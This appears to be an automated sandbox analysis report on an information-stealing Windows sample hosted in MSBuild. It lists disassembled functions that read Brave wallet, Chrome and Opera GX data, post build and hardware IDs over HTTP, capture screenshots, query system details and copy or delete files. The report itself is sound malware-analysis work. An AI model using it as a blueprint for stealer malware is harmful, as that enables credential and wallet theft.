                                                                                                                                                                                                                                                                            • String ID: Brave$E$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences$p@$p@E
                                                                                                                                                                                                                                                                            • API String ID: 2567437900-2467990661
                                                                                                                                                                                                                                                                            • Opcode ID: a4a659c085f4578309f57611426e91475dc4e9c324af32b8baff43b8d756086c
                                                                                                                                                                                                                                                                            • Instruction ID: ae1f48a692d5d46922722a01a953bd659f061a71a50a6572180acf0b0686347d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4a659c085f4578309f57611426e91475dc4e9c324af32b8baff43b8d756086c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0828270900248EADB14EBA5D945BDDBBB96F19304F5080BEF505732D2DB782B4CCBA6
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00404500 Relevance: 39.0, APIs: 13, Strings: 9, Instructions: 537networkfilestringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 2488 404500-4045f2 call 40fe60 call 404430 call 40fe20 * 5 call 4100c0 InternetOpenA StrCmpCA 2505 4045f4 2488->2505 2506 4045fb-4045fd 2488->2506 2505->2506 2507 404603-404781 call 411450 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff50 call 40ff00 call 40fea0 * 2 InternetConnectA 2506->2507 2508 404b68-404bf7 InternetCloseHandle call 411380 * 2 call 40fea0 * 8 2506->2508 2507->2508 2579 404787-4047bf HttpOpenRequestA 2507->2579 2580 4047c5-4047c9 2579->2580 2581 404b5b-404b65 InternetCloseHandle 2579->2581 2582 4047e1-404af3 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40fe20 call 40ff50 * 2 call 40ff00 call 40fea0 * 2 call 4100c0 lstrlen call 4100c0 * 2 lstrlen call 4100c0 HttpSendRequestA InternetReadFile 2580->2582 2583 4047cb-4047db InternetSetOptionA 2580->2583 2581->2508 2694 404af5-404afa 2582->2694 2695 404b49-404b56 InternetCloseHandle call 40fea0 2582->2695 2583->2582 2694->2695 2696 404afc-404b47 call 40ffe0 call 40ff00 call 40fea0 InternetReadFile 2694->2696 2695->2581 2696->2694 2696->2695
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045CA
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00E39A60,?,?,?,?,?,?,00000000), ref: 004045EA
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404774
                                                                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,00E39900,?,00E39E50,00000000,00000000,-00400100,00000000), ref: 004047B5
                                                                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004047DB
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,0041FDC9,?,?,?,00426885,00000000,0041FDC9,?,00000000,0041FDC9,",00000000,0041FDC9,build_id), ref: 00404AAA
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00404AC3
                                                                                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD4
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 00404AEB
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 00404B3F
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00404B4A
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00404B5F
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00404B69
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$FileHttpOpenReadRequestlstrcat$ConnectCrackOptionSend
                                                                                                                                                                                                                                                                            • String ID: !$"$"$------$------$------$`h$build_id$hwid
                                                                                                                                                                                                                                                                            • API String ID: 1585128682-3662324238
                                                                                                                                                                                                                                                                            • Opcode ID: 9d778b4aa2deb08cd358f78b548b6816cd00b3c1542e7757b00d46b6ee996e33
                                                                                                                                                                                                                                                                            • Instruction ID: 5fc5c06e662f0cc56ec579075a690d6072dddc9a0b5f03a20420b071163eae1a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d778b4aa2deb08cd358f78b548b6816cd00b3c1542e7757b00d46b6ee996e33
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E222C71801149EADB15E7E4C952BEEBBB8AF15304F54407EE601731D2DF782B0CCAA9
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAB35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294stringtimeCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 2704 6cab35a0-6cab35be 2705 6cab38e9-6cab38fb call 6caeb320 2704->2705 2706 6cab35c4-6cab35ed InitializeCriticalSectionAndSpinCount getenv 2704->2706 2707 6cab38fc-6cab390c strcmp 2706->2707 2708 6cab35f3-6cab35f5 2706->2708 2707->2708 2710 6cab3912-6cab3922 strcmp 2707->2710 2711 6cab35f8-6cab3614 QueryPerformanceFrequency 2708->2711 2713 6cab398a-6cab398c 2710->2713 2714 6cab3924-6cab3932 2710->2714 2715 6cab361a-6cab361c 2711->2715 2716 6cab374f-6cab3756 2711->2716 2713->2711 2719 6cab3938 2714->2719 2720 6cab3622-6cab364a _strnicmp 2714->2720 2715->2720 2721 6cab393d 2715->2721 2717 6cab396e-6cab3982 2716->2717 2718 6cab375c-6cab3768 2716->2718 2717->2713 2722 6cab376a-6cab37a1 QueryPerformanceCounter EnterCriticalSection 2718->2722 2719->2716 2723 6cab3650-6cab365e 2720->2723 2724 6cab3944-6cab3957 _strnicmp 2720->2724 2721->2724 2725 6cab37b3-6cab37eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 2722->2725 2726 6cab37a3-6cab37b1 2722->2726 2727 6cab395d-6cab395f 2723->2727 2728 6cab3664-6cab36a9 GetSystemTimeAdjustment 2723->2728 2724->2723 2724->2727 2729 6cab37ed-6cab37fa 2725->2729 2730 6cab37fc-6cab3839 LeaveCriticalSection 2725->2730 2726->2725 2731 6cab36af-6cab3749 call 6caec110 2728->2731 2732 6cab3964 2728->2732 2729->2730 2733 6cab383b-6cab3840 2730->2733 2734 6cab3846-6cab38ac call 6caec110 2730->2734 2731->2716 2732->2717 2733->2722 2733->2734 2739 6cab38b2-6cab38ca 2734->2739 2740 6cab38dd-6cab38e3 2739->2740 2741 6cab38cc-6cab38db 2739->2741 2740->2705 2741->2739 2741->2740
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(6CB3F688,00001000), ref: 6CAB35D5
                                                                                                                                                                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CAB35E0
                                                                                                                                                                                                                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 6CAB35FD
                                                                                                                                                                                                                                                                            • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CAB363F
                                                                                                                                                                                                                                                                            • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CAB369F
                                                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 6CAB36E4
                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 6CAB3773
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(6CB3F688), ref: 6CAB377E
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(6CB3F688), ref: 6CAB37BD
                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 6CAB37C4
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(6CB3F688), ref: 6CAB37CB
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(6CB3F688), ref: 6CAB3801
                                                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 6CAB3883
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6CAB3902
                                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6CAB3918
                                                                                                                                                                                                                                                                            • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6CAB394C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                                                                                                                            • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                                                                                                                                            • API String ID: 301339242-3790311718
                                                                                                                                                                                                                                                                            • Opcode ID: 5651da93cde4b9a8cc14499a3fe937cfc9ca388d670d9ff9a7cb00bf870c5380
                                                                                                                                                                                                                                                                            • Instruction ID: cd91b1e74444907990cd5c2de1cffe4c407744ab3b8027bedc51ff8dbde5dd1e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5651da93cde4b9a8cc14499a3fe937cfc9ca388d670d9ff9a7cb00bf870c5380
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DFB1C271B093509FDB18DF29C95465EBBF9BB8A700F04892EE89DD3390DB30A844CB85
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00417550 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 198stringfileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcat$wsprintf$File$CopyFindFirstMatchPathSpec
                                                                                                                                                                                                                                                                            • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                                                                            • API String ID: 3791670087-445461498
                                                                                                                                                                                                                                                                            • Opcode ID: 974bde728eb2ea4341a37141b836e6704171ada0683ba1d6d79cfbd9337a40f3
                                                                                                                                                                                                                                                                            • Instruction ID: 7ff546ba37fb225437adfdcfe4c42a1338871a9dd952cfc4639d17004bec3dc0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 974bde728eb2ea4341a37141b836e6704171ada0683ba1d6d79cfbd9337a40f3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A71D4B5904218ABCB10DFA5DC45EEE7B79FB48700F00459DF619A3190DB789A48CFA4
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00411020 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 166memorycomtimeCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?,004273DC,00000000), ref: 00411043
                                                                                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4), ref: 00411054
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00427D04,00000000,00000001,00427C34,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000), ref: 0041106E
                                                                                                                                                                                                                                                                            • CoSetProxyBlanket.OLE32(004273DC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4,00000000), ref: 004110A7
                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00411106
                                                                                                                                                                                                                                                                              • Part of subcall function 00410F70: CoCreateInstance.OLE32(00427AB4,00000000,00000001,00427260,?,00000001,00000001,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?), ref: 00410F8D
                                                                                                                                                                                                                                                                              • Part of subcall function 00410F70: SysAllocString.OLEAUT32(?), ref: 00410F9C
                                                                                                                                                                                                                                                                              • Part of subcall function 00410F70: _wtoi64.MSVCRT ref: 00410FE2
                                                                                                                                                                                                                                                                              • Part of subcall function 00410F70: SysFreeString.OLEAUT32(?), ref: 00410FF8
                                                                                                                                                                                                                                                                              • Part of subcall function 00410F70: SysFreeString.OLEAUT32(00000000), ref: 00410FFB
                                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(004273F4,?,?,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?), ref: 00411140
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?), ref: 0041114C
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?,004273DC), ref: 00411153
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00411197
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 0041117F
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                                                                                            • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$WQL
                                                                                                                                                                                                                                                                            • API String ID: 1611285705-2016369993
                                                                                                                                                                                                                                                                            • Opcode ID: 1e650331b11e195a696a9c7b5176a8fbbcc06761d9eaa63042d3f28111d4caa6
                                                                                                                                                                                                                                                                            • Instruction ID: 75a545c076d1dd2e0cda86b1f31a52cb2c57117cf048d23ae71c1147ee9a352d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e650331b11e195a696a9c7b5176a8fbbcc06761d9eaa63042d3f28111d4caa6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74515C71A01229BBCB20DF95DC45EFFBB78EF49B11F00421AF605A2290D6789A41CBE4
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00411D10 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 211windowCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00411D4B
                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00411DCA
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00411DD7
                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00411DDE
                                                                                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00411DE7
                                                                                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411DF8
                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00411E03
                                                                                                                                                                                                                                                                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411E23
                                                                                                                                                                                                                                                                            • GlobalFix.KERNEL32(000000FF), ref: 00411E9D
                                                                                                                                                                                                                                                                            • GlobalSize.KERNEL32(000000FF), ref: 00411EAA
                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00411F29
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00411F47
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00411F4E
                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00411F56
                                                                                                                                                                                                                                                                            • CloseWindow.USER32(00000000), ref: 00411F5D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Object$Window$CompatibleCreateDeleteGlobalSelect$BitmapCloseDesktopRectReleaseSizememset
                                                                                                                                                                                                                                                                            • String ID: image/jpeg
                                                                                                                                                                                                                                                                            • API String ID: 1311022706-3785015651
                                                                                                                                                                                                                                                                            • Opcode ID: 6045e70124a063fd817f36946047118938c98b6f81358632b24748c686294da3
                                                                                                                                                                                                                                                                            • Instruction ID: 955233e89dab8965993365ce23471f417d3a05ebbc493c96f06fa7f3e3f93d87
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6045e70124a063fd817f36946047118938c98b6f81358632b24748c686294da3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A716CB5900218AFDB10DFE4DD45BEEBBB9EF49704F10412EFA05A3291D7386A05CBA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 004011E0 Relevance: 27.1, APIs: 12, Strings: 3, Instructions: 801fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00423334,?,004020FB,?,00423330,?,00000000,00000000,?,00000000), ref: 00401446
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00423338,?,00000000), ref: 004014BC
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,0042333C,?,00000000), ref: 004014D6
                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00423348,?,?,?,00423344,?,004020FB,?,00423340,?,00000000), ref: 00401603
                                                                                                                                                                                                                                                                              • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,00E300C0,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00401894
                                                                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,L3B,?,?,?,?,?,0042334C,?,00000000), ref: 004018D7
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,0042334C,?,00000000), ref: 004018E6
                                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040180E
